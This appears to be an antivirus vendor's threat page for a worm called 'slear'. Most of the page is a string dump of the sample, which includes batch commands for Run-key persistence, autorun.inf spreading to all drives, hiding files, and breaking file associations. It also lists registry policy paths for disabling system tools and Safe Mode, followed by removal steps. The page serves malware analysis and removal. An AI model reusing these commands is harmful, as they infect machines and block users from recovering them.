echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat  r  s  h%
attrib %systemroot%/windows.bat  r  s  h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat  r  s  h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf  r  s  h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf  r  s  h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat  r  s  h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat  r  s  h >nul
http://www.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
assoc .exe=nullfile
assoc .reg=nullfile
assoc .bat=nullfile
assoc .cmd=nullfile
assoc .vbs=nullfile
assoc .txt=nullfile
assoc .com=nullfile
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
goto 22c:\slears.bat
.slear
d:\sleartest.exe
adm-music.com
O%u,%
J÷%
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
c:\windows\system32\
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
www.dywt.com.cn
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
UnhookWindowsHookEx
.text
`.rdata
@.data
.rsrc
(*.*)


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\slear.exe (1425 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "slear.exe" = "c:\windows\system32\slear.exe"

  5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now